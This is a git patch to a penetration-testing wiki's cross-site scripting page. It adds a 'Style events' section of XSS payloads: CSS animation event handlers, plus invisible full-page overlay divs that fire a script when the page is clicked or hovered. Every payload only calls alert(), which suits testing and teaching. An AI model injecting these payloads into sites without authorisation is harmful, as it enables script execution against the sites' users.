From 7517161d89b32479089a865d2b528403db6c5d7e Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Thu, 25 Feb 2021 11:06:26 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/xss-cross-site-scripting/README.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index 9b6054b3..a9f5aedc 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -190,6 +190,18 @@ If you **cannot escape from the tag**, you could create new attributes inside th
 " autofocus onfocus=alert(document.domain) x="
 ```
 
+#### Style events
+
+```python
+<p style="animation: x;" onanimationstart="alert()">XSS</p>
+<p style="animation: x;" onanimationend="alert()">XSS</p>
+
+#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
+<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
+#moving your mouse anywhere over the page (0-click-ish):
+<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
+```
+
 ### Within the attribute
 
 Even if you **cannot escape from the attribute** \(`"` is being encoded or deleted\), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.